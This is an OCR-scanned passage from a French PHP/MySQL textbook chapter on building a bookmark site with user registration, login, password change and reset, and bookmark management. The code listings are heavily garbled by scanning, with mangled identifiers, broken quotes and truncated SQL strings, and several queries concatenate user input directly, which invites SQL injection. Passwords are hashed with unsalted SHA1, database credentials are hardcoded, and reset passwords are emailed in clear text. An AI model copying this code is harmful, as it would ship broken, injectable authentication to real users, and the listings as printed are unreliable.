// Verifie que la longueur du mot de passe est correcte. 

// On peut tronquer le nom de 1 ' utilisateur, mais pas les mots de 

/ /passe . 

if ( (strlen($passwd) < 6) | | (strlen($passwd) > 16)) { 
throw new Exception (' Your password must be between 6 and 16 
characters. 

Please go back and try again.'); 

} 

// Tentative d ' enregistrement 
// Cette fonction peut lever une exception 
register($username, $email, $passwd); 
// Enregistre la variable de session 
$_SESSI0N[ ' valid_user ' ] = $username; 

// Fournit un lien vers la page des membres 
do_html_header( 'Registration successful' ) ; 
echo 'Your registration was successful. 

Go to the members page to start 

setting up your bookmarks!'; 
do_html_url( 'member. php' , 'Go to members page'); 

// end page 
do_html_f ooter( ) ; 

} 

catch (Exception $e) { 

do_html_header( ' Problem: ' ) ; 
echo $e->getMessage( ) ; 
do_html_f ooter( ) ; 
exit; 
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II s'agit du premier script un peu complexe de cette application. II commence par 
inclure les fichiers de fonctions de 1' application, avant d'ouvrir une session. Si l'utilisa- 
teur est enregistre, nous nous servons de son nom d'utilisateur comme variable de 
session, comme nous l'avons fait au Chapitre 21. 

Le corps du script intervient dans un bloc t ry car vous verifiez un certain nombre de 
conditions. Si l'une d'entre elles echoue, l'execution est deroutee vers le bloc catch, 
comme nous allons le voir sous peu. 

Ensuite, nous validons des donnees saisies par l'utilisateur. Nous devons tester un 
certain nombre de conditions : 

■ On verifie que le formulaire est rempli correctement. Pour cela, nous appelons la 
fonction filled out() : 

if ( !filled_out($_POST)) 

Cette fonction est l'une de celles que nous avons ecrites nous-memes. Elle se trouve 
dans la bibliotheque de fonctions du fichier data_valid_fns.php. Nous reviendrons 
sur cette fonction dans un instant. 

■ On verifie que 1' adresse e-mail fournie est valide : 
if (valid_email($email) ) 

II s'agit egalement d'une fonction que nous avons ecrite et qui se trouve dans la 
bibliotheque data_yalid_fns.php. 

■ On verifie que les deux mots de passe saisis par l'utilisateur sont identiques : 
if ($passwd != $passwd2) 

On verifie que la longueur du mot de passe est correcte : 

if (strlen($passwd)< 6) 

et 

if (strlen($passwd) > 16) 

Dans cette application, le mot de passe doit contenir au moins 6 caracteres pour 
qu'il soit suffisamment difficile a deviner et compter moins de 17 caracteres pour 
tenir dans notre base de donnees. Notez que la longueur maximale du mot de 
passe n'est pas restreinte de cette facon car ce dernier est stocke sous forme de 
hachage SHA1, qui fait toujours 40 caracteres de long, quelle que soit la 
longueur du mot de passe. 

Les fonctions de validation des donnees dont nous nous sommes servis, filled out ( ) 
et valid email ( ) , sont presentees, respectivement, dans les Listings 25.7 et 25.8. 



580 Partie V 



Creer des projets avec PHP et MySQL 



Listing 25.7 : La fonction filled_out() de data_valid_fns.php — Cette fonction verifie 
que le formulaire a bien ete rempli 



function f illed_out ($f orm_vars) { 

// Teste que chaque champ du formulaire a une valeur. 
foreach ($form_vars as $key => $value) { 

if ( ( !isset($key) ) || ($value == '')) { 
return false; 

} 

} 

return true; 

} 



Listing 25.8 : La fonction valid_email() de data_valid_fns.php — Cette fonction verifie 
que I'adresse e-mail est valide 



function valid_email($address) { 

// Vefifie qu'une adresse email est probablement valide 
if (ereg( " [a-zA-Z0-9_\ . \-]+(a[a-zA-Z0-9\-]+\ . [a-zA-Z0-9\- \ . ]+$' , 
$address)) { 
return true; 
} else { 

return false; 

} 

} 



La fonction filled out ( ) prend un tableau de variables en parametres (il s'agit gene- 
ralement de $ POST ou de $ GET). Elle verifie si toutes les variables de ce tableau sont 
bien remplies et renvoie true si c'est bien le cas, false dans le cas contraire. 

La fonction valid email ( ) se sert d'une expression reguliere legerement plus compli- 
quee que celle que nous avions presentee au Chapitre 4 pour valider I'adresse e-mail. 
Elle renvoie true si I'adresse est valide et false dans le cas contraire. 

Apres avoir valide les donnees d'entree, nous pouvons enregistrer l'utilisateur. Si vous 
revenez au Listing 25.6, vous verrez que nous le faisons de la maniere suivante : 

register($username, $email, $passwd); 
// Enregistre la variable de session 
$_SESSI0N[ 1 valid_user' ] = $username; 

// provide link to members page 
do_html_header ( 1 Registration successful ' ) ; 
echo 'Your registration was successful. 

Go to the members page to start 

setting up your bookmarks!'; 
do_html_url( 'member. php' , 'Go to members page'); 

// end page 
do_html_f ooter( ) ; 
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Comme vous pouvez le constater, nous appelons la fonction register ( ) avec le nom de 
l'utilisateur, son adresse e-mail et son mot de passe. Si cette fonction ne renvoie aucune 
erreur, nous enregistrons le nom de l'utilisateur dans une variable de session et nous affi- 
chons un lien vers la page principale des membres (si elle echoue, cette fonction leve une 
exception qui sera capturee dans le bloc catch). La sortie est presentee a la Figure 25.5. 
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Your registration was successful. Go to the members page to start setting up your bookmarks! 
Go to members pace 



Figure 25.5 

Un enregistrement reussi. L'utilisateur peut maintenant alter sur la page des membres. 



La fonction register ( ) se trouve dans la bibliotheque user_auth_fns.php. Son code est 
presente dans le Listing 25.9. 

Listing 25.9 : La fonction register() de user_auth_fns.php — Cette fonction tente 
d'ajouter les informations du nouvel utilisateur dans la base de donnees 



function register($username, $email, $password) { 

// Enregistre une nouvelle personne dans la base de donnees. 

// Renvoie true ou leve une exception avec un message d'erreur. 

// Connexion a la base de donnees. 
$conn = db_connect ( ) ; 

// Verifie que le nom d ' utilisateur est unique 
$result = $conn->query( "select * from user where 

username= ' " .$username ) ; 

if (!$result) { 

throw new Exception (' Could not execute query'); 

} 
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if ($result->num_rows>0) { 
throw new Exception (' That username is taken - 

go back and choose another one.'); 

} 

// Si c'est bon, on l'ajoute a la base de donnees. 
$result = $conn->query ( "insert into user values 

( ' " .$username. " ' , shal ( ' " .$password. " ' ) , 
' " .$email. "')"); 

if (!$result) { 
throw new Exception ( 1 Could not register you in database - 
please try again later. 1 ); 

} 

return true; 

} 



Cette fonction ne contient aucun element nouveau. Elle se connecte a la base de 
donnees que nous avons installee precedemment. Si le nom d'utilisateur indique est 
deja pris ou si la base de donnees ne peut pas etre mise a jour, cette fonction lance une 
exception. Dans le cas contraire, elle met a jour la base de donnees et renvoie true. 

Nous pouvons cependant remarquer que nous effectuons la connexion a la base de 
donnees avec une fonction que nous avons ecrite, db connect ( ). Celle-ci se contente 
de fournir un emplacement contenant un nom d'utilisateur et un mot de passe permet- 
tant de se connecter a la base de donnees. De cette maniere, si le mot de passe a la base 
de donnees doit etre modifie, il suffit de le changer dans un fichier de notre application. 
Le Listing 25.10 contient le code de cette fonction. 

Listing 25.10 : La fonction db_connect() de dbjfns.php — Cette fonction eta b I it la 
connexion a la base de donnees MySQL 



<?php 

function db_connect() { 

$result = new mysqli( ' localhost ' , 'bm_user', 'password', 'bookmarks'); 
if (!$result) { 

throw new Exception (' Could not connect to database server'); 
} else { 

return $result; 

} 

} 

?> 



Les utilisateurs enregistres peuvent se connecter et se deconnecter en utilisant les pages 
de connexion et de deconnexion que nous allons maintenant construire. 
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Connexion 

Lorsqu'un utilisateur saisit ses informations dans le formulaire du script login.php (voir 
Figure 25.3) et qu'il le soumet, il est dirige vers le script member.php qui le connecte 
s'il vient de completer le formulaire et qui affiche tous ses sites favoris. Ce script est 
done le centre de notre application et il est presente dans le Listing 25. 1 1. 

Listing 25.11 : member.php — Le script central de I'application 



<?php 

// Inclut les fichiers de fonctions pour cette application. 
require_once ( ' bookmark_f ns . php ' ) ; 
session_start( ) ; 

// Creation de variables aux noms courts 
$username = $_P0ST[ ' username ' ] ; 
$passwd = $_P0ST[ 'passwd' ] ; 

if (Susername && $passwd) { 
//II vient d'essayer de se connecter 
try { 

login($username, $passwd); 

// S'il est dans la base, on enregistre son ID 
S_SESSI0N[ 1 valid_user' ] = Susername; 

} 

catch(Exception $e) { 
// Echec de la connexion 
do_html_header( 1 Problem: 1 ) ; 
echo 'You could not be logged in. 

You must be logged in to view this page.'; 
do_html_url ( ' login . php ' , ' Login ' ) ; 
do_html_footer( ) ; 
exit ; 

} 

} 

do_html_header( ' Home ' ) ; 
check_valid_user( ) ; 

// Recupere les favoris sauvegardes par cet utilisateur 
if ($url_array = get_user_urls ($_SESSI0N [ ' validjjser ' ] ) ) { 
display_user_urls($url_array) ; 

} 

// Presente le menu des options 
display_user_menu ( ) ; 

do_html_f ooter( ) ; 

?> 



Vous reconnaissez peut-etre la logique de ce script car nous y reprenons certaines idees 
du Chapitre 21. 
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Tout d'abord, nous verifions si l'utilisateur vient de remplir le formulaire et nous 
tentons de le connecter : 

if ($username && $passwd) { 
//II vient d'essayer de se connecter 
try { 

login ($username, $passwd); 

// S'il est dans la base, on enregistre son ID 
$_SESSI0N[ ' valid_user 1 ] = $username; 

} 

Vous pouvez constater que nous tentons de connecter l'utilisateur avec une fonction 
appelee login ( ), qui est dermic dans la bibliotheque user_auth_fns.php ; nous allons 
etudier son code dans un instant. 

Si la connexion reussit, nous enregistrons cette session comme nous le faisions auparavant, 
en stockant le nom de l'utilisateur dans la variable de session valid user. 

Si tout se passe bien, nous pouvons ensuite afficher la page personnelle de l'utilisateur : 

do_html_header( ' Home ' ) ; 
check_valid_user( ) ; 

// Recupere les favoris sauvegardes par cet utilisateur 
if ($url_array = get_user_urls ($_SESSI0N [ 1 valid_user ' ] ) ) { 
display_user_urls($url_array) ; 

} 

// Presente le menu des options 
display_user_menu ( ) ; 

do_html_f ooter( ) ; 

Une fois de plus, cette page est creee a l'aide des fonctions d'affichage. Vous remarque- 
rez que nous utilisons egalement plusieurs nouvelles fonctions : check valid user( ) 
de user_auth_fns.php, get user urls () de urljhs.php et display user urls()de 
output Jns.php. La fonction check valid user( ) verifie si l'utilisateur courant a enre- 
gistre une session. Elle est destinee non pas aux utilisateurs qui viennent juste de se 
connecter, mais a ceux qui sont en plein milieu de leur session. La fonction get 
user urls() recupere les favoris d'un utilisateur dans la base de donnees et 
display user urls() les affiche dans le navigateur, sous forme de tableau. Nous 
reviendrons sur check valid user ( ) et sur les deux autres fonctions dans un instant, 
dans la section consacree a l'enregistrement et a la recuperation des favoris. 

Le script member.php termine la page en affichant un menu avec la fonction 
display user menu(). 

Un exemple de ce qu'il produit est presente a la Figure 25.6. 

Etudions maintenant plus precisement les fonctions login () et check valid user(). 
La fonction login ( ) est presentee dans le Listing 25.12. 
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Figure 25.6 

Le script member.php verifie si un utilisateur s'est bien connecte, va chercher ses favoris 
dans la base de donnees, les affiche et affiche egalement un menu d'options. 

Listing 27.12 : La fonction loginQ de user_auth_fns.php — Cette fonction verifie 
les informations fournies par un utilisateur avec la base de donnees 



function login ($username , $password) { 

// Verifie le nom d ' utilisateur et le mot de passe dans la base de 
// donnees. Renvoie true si ok ; leve une exception sinon. 

// Connexion a la base de donnees. 
$conn = db_connect ( ) ; 

// Verifie si le nom d ' utilisateur est unique. 
$result = $conn->query( "select * from user 

where username= ' " .$username. " ' 

and passwd = shal ( 1 " .$password ."')") ; 

if (!$result) { 

throw new Exception (' Could not log you in. 1 ); 

} 

if ($result->num_rows>0) { 

return true; 
} else { 

throw new Exception (' Could not log you in. 1 ); 

} 

} 
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Comme vous pouvez le constater, cette fonction se connecte a la base de donnees et 
verifie s'il existe bien un utilisateur possedant le nom et le mot de passe indiques, 
auquel cas elle renvoie true. Elle leve une exception dans le cas contraire ou si les 
informations de l'utilisateur n'ont pas pu etre verifiees. 

La fonction check valid user ( ) ne se connecte pas a nouveau a la base de donnees : 
elle se contente de verifier si l'utilisateur a bien enregistre une session, c'est-a-dire s'il 
est deja connecte sur le site. Cette fonction est presentee dans le Listing 25.13. 

Listing 25.13 : La fonction check_valid_user ( ) de user_auth_fns.php — Cette fonction 
verifie si l'utilisateur possede une session valide 



function check_valid_user ( ) { 

// Verifie si quelqu'un est connecte et l'avertit dans le cas contraire. 

if (isset($_SESSION[ 'valid_user'])) { 

echo "Logged in as " .$_SESSION[ ' valid_user' ] . " .<br />"; 
} else { 

// Non connecte 

do_html_heading ( 'Problem: ' ) ; 

echo 'You are not logged in.<br />'; 

do_html_url( ' login . php ' , ' Login ' ) ; 

do_html_f ooter( ) ; 

exit; 

} 

} 



Si l'utilisateur n'est pas connecte, cette fonction lui indique qu'il doit l'etre pour afficher 
cette page et lui propose un lien vers la page de connexion. 

Deconnexion 

Vous avez peut-etre remarque qu'il existe un lien Logout sur le menu de la Figure 25.6. 
H s'agit d'un lien vers le script logout.php, dont le code est presente dans le Listing 25. 14. 

Listing 25.14 : logout.php — Ce script termine la session d'un utilisateur 



<?php 

// Inclut les fichiers de fonctions pour cette application. 
require_once ( ' bookmark_f ns . php ' ) ; 
session_start( ) ; 

$old_user = $_SESSION[ 1 valid_user ' ] ; 

// On stocke l'ancienne variable de session pour voir s'il 

// *etait* connecte. 

unset ($_SESSION[ ' valid_user' ] ) ; 

$result_dest = session_destroy ( ) ; 

// Debut de l'affichage HTML 
do_html_header( ' Logging Out'); 
if ( !empty($old_user) ) { 
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if ($result_dest) { 

// S'il etait connecte, et qu'il est maintenant deconnecte 

echo 'Logged out.<br />'; 

do_html_url ( 1 login . php 1 , 1 Login ' ) ; 
} else { 

// S'il etait connecte et qu'on ne peut pas le deconnecter 
echo 'Could not log you out.<br />'; 

} 

} else { 

// S'il n'etait pas connecte et qu'il est arrive ici on ne sait comment 
echo 'You were not logged in, and so have not been logged out.<br />'; 
do_html_url( ' login . php ' , ' Login ' ) ; 



do_html_f ooter( ) ; 



Une fois de plus, ce code peut vous sembler familier puisqu'il est identique a celui que 
nous avions ecrit au Chapitre 21. 

Modifier les mots de passe 

Lorsqu'un utilisateur choisit 1' option Change Password, il obtient le formulaire 
presente a la Figure 25.7. 
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Figure 25.7 

Le script change_passwd_form.php affiche un formulaire dans iequel ies utilisateurs peuvent 
modifier leur mot de passe. 
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Ce formulaire est produit par le script change _passwd_form.php , qui se contente 
d'utiliser les fonctions de la bibliotheque d'affichage, c'est pourquoi il est inutile de 
presenter son code source ici. 

Lorsque ce formulaire est envoye, il active le script change _passwd.php, qui est 
presente dans le Listing 25.15. 

Listing 25.15 : change _passwd.php — Ce script tente de modifier le mot de passe d'un 
utilisateur 



<?php 

require_once( ' bookmark_f ns . php ' ) ; 
session_start ( ) ; 

do_html_header( 'Changing password ' ) ; 

// Creation de variables aux noms courts 
$old_passwd = $_P0ST[ ' old_passwd ' ] ; 
$new_passwd = $_P0ST[ ' new_passwd ' ] ; 
$new_passwd2 = $_POST[ ' new_passwd2 ' ] ; 

try { 

check_valid_user( ) ; 
if ( !filled_out($_POST) ) { 
throw new Exception (' You have not filled out the form completely. 
Please try again . ' ) ; 

} 

if ($new_passwd != $new_passwd2) { 

throw new Exception (' Passwords entered were not the same. 
Not changed. ' ) ; 

} 

if ( (strlen($new_passwd) > 16) || (strlen($new_passwd) < 6)) { 
throw new Exception (' New password must be between 6 
and 16 characters. 
Try again . ' ) ; 

} 

// attempt update 

change_password($_SESSION[ 1 valid_user' ] , $old_passwd, $new_passwd) ; 
echo 'Password changed.'; 

} 

catch (Exception $e) { 
echo $e->getMessage( ) ; 

} 

display_user_menu ( ) ; 
do_html_f ooter( ) ; 

?> 



Ce script verifie que 1' utilisateur s'est bien connecte (en utilisant 
check valid user ( )), que le formulaire du mot de passe a bien ete rempli (a l'aide de 
filled out()), que les nouveaux mots de passe sont identiques et qu'ils ont une 
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longueur appropriee. Rien de tout cela n'est tres nouveau. Si tout se passe bien, il 
appelle la fonction change password ( ) : 

change_password($_SESSION[ 1 valid_user' ] , $old_passwd, $new_passwd) ; 
echo 'Password changed.'; 

Cette fonction provient de la bibliotheque user_auth_fns.php et son code est presente 
dans le Listing 25. 16. 

Listing 25.16 : La fonction change _password() de user_auth_fns.php — Cette fonction 
tente de mettre a jour le mot de passe d'un utilisateur dans la base de donnees 



function change_password ($username , $old_password , $new_password) { 
// Modifie le mot de passe de $username : old -> new 
// Renvoie true ou leve une exception 

// Si l'ancien mot de passe est correct, 

// choisit new_password comme nouveau mot de passe et renvoie true. 

// Sinon leve une exception. 

login($username, $old_password) ; 

$conn = db_connect( ) ; 

$result = $conn->query ( "update user 

set passwd = shal ( ' " .$new_password. " ' ) 
where username = ' " .$username ); 

if (!$result) { 

throw new Exception (' Password could not be changed.'); 
} else { 

return true; // Succes de la modification 

} 

} 



Cette fonction verifie que l'ancien mot de passe fourni est correct a l'aide de la fonction 
login ( ) que nous avons deja vue. Si tout se passe bien, cette fonction se connecte a la 
base de donnees et met a jour le mot de passe. 

Reinitialiser les mots de passe oublies 

En plus de modifier les mots de passe, nous devons etre capables de gerer la situation, 
relativement courante, dans laquelle un utilisateur a oublie son mot de passe. Vous 
remarquerez que sur la page d'accueil, login.php, nous proposons un lien pour les utili- 
sateurs qui se trouvent dans cette situation, Forgotten your password?. Ce lien amene 
les utilisateurs sur le script forgot _form.php, qui se sert des fonctions d'affichage pour 
produire le formulaire de la Figure 25.8. 

Ce script est tres simple puisqu'il se sert uniquement des fonctions d'affichage, et c'est 
la raison pour laquelle nous ne le detaillerons pas ici. Lorsque le formulaire est envoye, 
il appelle le script forgot _passwd.php, qui, lui, est plus interessant. Le Listing 25. 17 
contient le code source de ce script. 
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Figure 25.8 

Le script f org ot_form.php affiche un formulaire dans lequel les utilisateurs peuvent demander que 
leur mot de passe soit reinitialise et qu'on leur en envoie un nouveau. 



Listing 25.17 : forgot _passwd.php — Ce script reinitialise le mot de passe d'un 
utilisateur, en choisit un nouveau aleatoire et I'envoie par e-mail a son proprietaire 



<?php 

require_once( "bookmark_fns.php" ) ; 
do_html_header( "Resetting password" ) ; 

// Creation d'une variable au nom court 
$username = $_P0ST[ ' username '] ; 

try { 

$password = reset_password($username) ; 
notify_password($username, $password) ; 
echo 'Your new password has been emailed to you.<br />'; 

} 

catch (Exception $e) { 

echo 'Your password could not be reset - please try again later.'; 

} 

do_html_url( ' login . php ' , ' Login ' ) ; 
do_html_f ooter( ) ; 

?> 



Comme vous pouvez le constater, ce script se sert principalement de deux fonctions 
reset password ( ) et notify password ( ) , que nous allons maintenant examiner. 
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La fonction reset password () produit un mot de passe aleatoire et l'insere dans la 
base de donnees. Le code de cette fonction est presente dans le Listing 25. 18. 

Listing 25.18 : La fonction reset _password() de user_auth_fns.php — Ce script 
reinitialise le mot de passe d'un utilisateur avec un mot de passe aleatoire et le 
transmet par e-mail 



function reset_password($username) { 
// Choisit un mot de passe aleatoire. 

// Renvoie le nouveau mot de passe ou leve une exception. 

// Recherche un mot dans le dictionnaire, entre 6 et 13 lettres. 
$new_password = get_random_word(6, 13); 

if ($new_password == false) { 
throw new Exception (' Could not generate new password.'); 

} 

// Ajoute un nombre entre et 999 pour ameliorer un peu 
// le mot de passe 
$rand_number = rand(0, 999); 
$new_password .= $rand_number; 

// Modifie le mot de passe dans la base ou leve une exception 

$conn = db_connect ( ) ; 

$result = $conn->query ( "update user 

set passwd = shal ( ' " .$new_password. " ' ) 
where username = ' " .$username ); 

if (!$result) { 

throw new Exception (' Could not change password.'); // non modifie 
} else { 

return $new_password ; // Succes de la modification 

} 

} 



Cette fonction produit un mot de passe aleatoire en cherchant un mot au hasard dans un 
dictionnaire, a l'aide de la fonction get random word( ), et en lui ajoutant un nombre 
quelconque, compris entre et 999. Cette fonction se trouve egalement dans la biblio- 
theque user_auth_fns.php ; elle est presentee dans le Listing 25.19. 

Listing 25.19 : La fonction get_random_word() de user_auth_fns.php — Cette fonction 
va rechercher un mot au hasard dans le dictionnaire pour produire les mots de passe 
aleatoires 



function get_random_word ($min_length , $max_length) { 

// Choisit un mot aleatoire dans le dictionnaire, avec la bonne longueur, 
// et le renvoie. 

// Produit un mot aleatoire. 
$word = ' ' ; 

// Modifiez le chemin pour I'adapter a votre systeme 
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$dictionary = 1 /usr/dict/words ' ; // the ispell dictionary 
$fp = @fopen($dictionary , 'r'); 
if(!$fp) { 
return false; 

} 

$size = f ilesize($dictionary) ; 

// Se place a un endroit aleatoire dans le dictionnaire. 
$rand_location = rand(0, $size) ; 
fseek($fp, $rand_location) ; 

// Recupere le prochain mot dont la longueur est correcte. 
while ( (strlen($word) < $min_length) || (strlen($word)>$max_length) || 
(strstr($word, ))) { 
if (feof($fp)) { 

fseek($fp, 0); // Si on est la fin, on revient au debut 

} 

// Saute le premier mot car il peut etre incomplet 

Sword = fgets($f p, 80) ; 

// Le mot de passe potentiel 

Sword = fgets($f p, 80) ; 

} 

Sword = trim(Sword); // Ote le \n ajoute par fgets 
return Sword; 



Cette fonction a done besoin d'un dictionnaire. Si vous etes sur un systeme Unix, le 
correcteur d'orthographe integre possede un dictionnaire de mots dont le chemin 
d'acces est generalement /usr/dict/words, comme ici, ou /usn 'share/ 'diet/words. S'il ne 
figure pas a l'un de ces emplacements, vous pouvez en principe le trouver a l'aide de la 
commande suivante : 

$ locate diet/words 

Si vous utilisez un autre systeme ou si vous ne souhaitez pas installer ispell, vous 
pouvez telecharger des listes de mots comme celle qu'utilise ispell sur le site http:// 
wordlist.sourceforge.net/. 

Ce site contient egalement des dictionnaires dans de nombreuses autres langues, ce qui 
vous permet, si vous le souhaitez, de construire vos mots de passe en norvegien ou en 
esperanto. Ces fichiers sont formates a raison d'un seul mot par ligne. 

Pour lire un mot aleatoirement dans ce fichier, nous choisissons un nombre aleatoire 
compris entre et la taille de ce fichier, puis nous lisons le fichier a partir de cet empla- 
cement. Si nous lisons a partir de cette position jusqu'au prochain retour chariot, on 
obtiendra probablement un mot partiel : e'est la raison pour laquelle nous sautons la 
ligne ou nous somme arrives et nous lisons le mot suivant en appelant la fonction 
fgets ( ) deux fois de suite. 
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Cette fonction recele deux astuces. Tout d'abord, si nous atteignons la fin du fichier 
pendant que nous lisons un mot, nous devons revenir au debut du fichier : 

if (feof($fp)) { 
fseek($fp, 0); // Si on est la fin, on revient au debut. 

} 

Mais il faut egalement que la longueur du mot soit comprise entre $min length et 
$max length. Si le mot obtenu ne remplit pas ces conditions, nous passons au mot 
suivant. Par ailleurs, nous evitons les mots contenant des apostrophes. Nous pourrions 
les proteger, mais il est plus simple de passer au mot suivant. 

Dans la fonction reset password (), apres avoir produit le nouveau mot de passe, nous 
mettons a jour la base de donnees et nous renvoyons ce nouveau mot de passe au script prin- 
cipal, qui le passe ensuite a notify password ( ) pour l'envoyer par e-mail a l'utilisateur. 

Le code de la fonction notify password ( ) est presente dans le Listing 25.20. 

Listing 25.20 : La fonction notify _password() de user_auth_fns.php — Cette fonction 
transmet le nouveau mot de passe a l'utilisateur par e-mail 



function notif y_password ($username , $password) { 

// Avertit l'utilisateur que son mot de passe a change. 

$conn = db_connect( ) ; 

$result = $conn->query( "select email from user 

where username= 1 " .$username ); 

if (!$result) { 

throw new Exception ( 1 Could not find email address.'); 
} else if ($result->num_rows == 0) { 

throw new Exception (' Could not find email address.'); 

// L'utilisateur n'est pas dans la base 
} else { 

$row = $result->fetch_object( ) ; 

$email = $row->email; 

$from = "From: support@phpbookmark \r\n"; 
$mesg = "Your PHPBookmark password has been changed to 
" . $password . " \ r\n " 

."Please change it next time you log in.\r\n"; 

if (mail($email, 'PHPBookmark login information', $mesg, $from)) { 

return true; 
} else { 

throw new Exception ( 1 Could not send email.'); 

} 

} 

} 



Dans cette fonction, qui prend en parametre un nom d'utilisateur et un nouveau mot de 
passe, nous nous contentons de chercher 1' adresse e-mail de 1' utilisateur dans la base de 
donnees et nous nous servons de la fonction mail( ) de PHP pour lui envoyer un courrier 
electronique. 
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II serait plus securise de fournir aux utilisateurs un mot de passe vraiment aleatoire, 
compose de lettres majuscules, de lettres minuscules, de chiffres et de signes de ponc- 
tuation. Cependant, un mot de passe comme zigzag487 est plus simple a lire et a saisir 
qu'un mot de passe reellement aleatoire. En effet, il est souvent difficile de differencier 
dans une chaine aleatoire les et les O (le chiffre zero ou la lettre o en majuscule), les 
1 et les 1 (le chiffre un ou la lettre L en minuscule). 

Sur notre systeme, le dictionnaire contient environ 45 000 mots. Cela signifie que, si un 
pirate tente de deviner un mot de passe, il lui faudra essayer en moyenne 22 500 000 mots 
de passe. Ce niveau de securite est suffisant pour une application de ce type, meme si les 
utilisateurs ne tiennent pas compte de notre conseil et ne le modifient pas ensuite. 

Implementation de I'enregistrement et de la recuperation des favoris 

Nous allons maintenant nous interesser a la maniere dont les favoris des utilisateurs 
sont stockes, recuperes et supprimes. 

Ajouter des liens 

Les utilisateurs peuvent ajouter des liens en cliquant sur l'option Add BM dans le menu. 
Cela les amene au formulaire presente a la Figure 25.9. 



y Add Bookmarlci - 



File Edit View History Bookmarks Tools H elp 
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Add bookmark 
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Recammend URLs to me | Logout 



□ one 



Figure 25.9 

Le script add_bm_form.php affiche un formulaire dans iequel les utilisateurs peuvent ajouter 
des liens vers leurs sites favoris. 



Chapitre 25 



Authentification des utilisateurs et personnalisation 595 



Une fois encore, ce script est tres simple, puisqu'il se contente d'utiliser les fonctions 
d'affichage. Lorsque le formulaire est envoye, il appelle le script addjbms.php, 
presente dans le Listing 25.21. 

Listing 25.21 : add_bms.php — Ce script ajoute de nouveaux favoris dans la page 
personnelle d'un utilisateur 



<?php 

require_once ( ' bookmark_f ns . php ' ) ; 
session_start( ) ; 

// Creation de la variable au nom abrege 
$new_url = $_P0ST[ ' new_url 1 ] ; 

do_html_header( 'Adding bookmarks ' ) ; 

try { 

check_valid_user( ) ; 

if ( !filled_out($_POST) ) { 

throw new Exception ( 1 Form not completely filled out.'); 

} 

// Verifie le format de URL 
if (strstr($new_url, ' http: // ' ) === false) { 
$new_url = ' http: / / ' . $new_url; 

} 

// Verifie si l'URL est valide 
if ( ! (@fopen($new_url, 'r'))) { 

throw new Exception (' Not a valid URL.'); 

} 

// Tente d'ajouter le favori 

add_bm($new_url) ; 

echo 'Bookmark added.'; 

// Recupere les favoris de cet utilisateur 
if ($url_array = get_user_urls($_SESSION[ ' valid_user' ] ) ) { 
display_user_urls($url_array) ; 

} 

} 

catch (Exception $e) { 
echo $e->getMessage( ) ; 

} 

display_user_menu ( ) ; 
do_html_f ooter( ) ; 

?> 



Ce script respecte aussi la procedure de validation, d'utilisation de la base de donnees et 
d'affichage. 

Pour la validation, nous devons verifier que 1' utilisateur a bien rempli le formulaire avec 
filled out(). Puis nous effectuons ensuite deux verifications sur l'URL. Tout 
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d'abord, a l'aide de strstr ( ), nous regardons si l'URL commence bien par http : / / . Si 
ce n'est pas le cas, nous ajoutons cette chaine de caracteres au debut de l'URL. Puis 
nous pouvons verifier si l'URL existe reellement. Comme nous l'avons vu au Chapi- 
tre 18, nous pouvons nous servir de fopen() pour ouvrir une URL commencant par 
http: / /.Si nous pouvons ouvrir le fichier correspondant a cette adresse, nous suppo- 
sons que l'URL est valide et nous appelons la fonction add bm( ) pour l'ajouter dans la 
base de donnees. 

Cette fonction, ainsi que toutes les autres fonctions liees aux favoris, se trouve dans la 
bibliotheque urljns.php. Vous trouverez le code de la fonction add bm() dans le 
Listing 25.22. 

Listing 25.22 : La fonction add_bm() de urljns.php — Cette fonction ajoute un 
nouveau favori dans la base de donnees 



function add_bm($new_url) { 

// Ajoute un nouveau favori dans la base de donnees. 

echo "Attempting to add " .htmlspecialchars($new_url) . "<br />"; 
$valid_user = $_SESSION[ 1 valid_user 1 ] ; 

$conn = db_connect( ) ; 

//Verifie que ce favori n'est pas deja stocke 
$result = $conn->query( "select * from bookmark 

where username= ' $valid_user ' 
and bm_URL= 1 " .$new_url. " 1 " ) ; 
if ($result && ($result->num_rows>0) ) { 
throw new Exception (' Bookmark already exists.'); 

} 

// Insere le nouveau favori 

if ( ! $conn->query ( "insert into bookmark values 
( "' .$valid_user. " 1 , "' .$new_url. " ' ) " ) ) { 
throw new Exception (' Bookmark could not be inserted.'); 

} 

return true; 

} 



Cette fonction est tres simple. Elle verifie qu'un utilisateur n'a pas deja enregistre ce 
lien dans la base de donnees (bien qu'il soit peu probable que les utilisateurs entrent 
deux fois le meme favori, il est possible que cela resulte d'un rafraichissement de leur 
page). S'il s'agit d'un nouveau favori, son URL est ajoutee dans la base de donnees. 
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Si nous revenons a add_bm.php, nous pouvons constater que ce script se termine en 
appelant get user urls () et display user urls ( ), comme member.php. Nous allons 
maintenant etudier ces fonctions. 

Aff icher les favoris 

Dans le script member.php et dans la fonction add bm(), nous nous servons de 
get user urls() et de display user urls(). Ces fonctions servent, respectivement, a 
recuperer les favoris de l'utilisateur dans la base de donnees et a les af richer. La fonction 
get user urls() se trouve dans la bibliotheque urljns.php et display user urls(), 
dans la bibliotheque output Jns.php. 

Le code de la fonction get user urls() se trouve dans le Listing 25.23. 

Listing 25.23 : La fonction get_user_urls() de url_fns.php — Cette fonction va chercher 
les favoris de l'utilisateur dans la base de donnees 



function get_user_urls($username) { 

// Extrait de la base de donnees tous les favoris de cet utilisateur. 
$conn = db_connect ( ) ; 
$result = $conn->query( "select bm_URL 

from bookmark 

where username = 1 " .$username ); 

if (!$result) { 
return false; 

} 

// Creation d'un tableau pour contenir les URL 
$url_array = array(); 

for ($count = 1; $row = $result->f etch_row( ) ; ++$count) { 
$url_array [$count] = $row[0]; 

} 

return $url_array; 

} 



Etudions rapidement cette fonction. Elle prend en parametre un nom d'utilisateur et va 
chercher ses favoris dans la base de donnees. Elle renvoie un tableau contenant ces 
favoris ou false si elle n'a pu recuperer aucun lien. 

Le tableau renvoye par get user urls() peut etre passe a display user urls(). II 
s'agit une fois encore d'une simple fonction d'affichage HTML permettant de formater 
les favoris de l'utilisateur sous forme tabulaire. Reportez-vous a la Figure 25.6 pour un 
exemple de resultat obtenu. En fait, la fonction place les favoris dans un formulaire en 
ajoutant pour chacune d'eux une case a cocher permettant de selectionner les favoris a 
supprimer. Ceci nous amene tout naturellement a la suppression des favoris. 
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Supprimer des favoris 

Lorsqu'un utilisateur selectionne des favoris pour les supprimer et qu'il clique sur 
l'option Delete BM du menu, le formulaire contenant les favoris est envoye. 
Chaque case a cocher est produite par la partie suivante de la fonction 
display user urls ( ) : 

echo "<tr bgcolor=\ " " .$color . " \ "><td><a href =\ " " .$url. " \ ">" 
. htmlspecialchars($url) . "</a></td> 
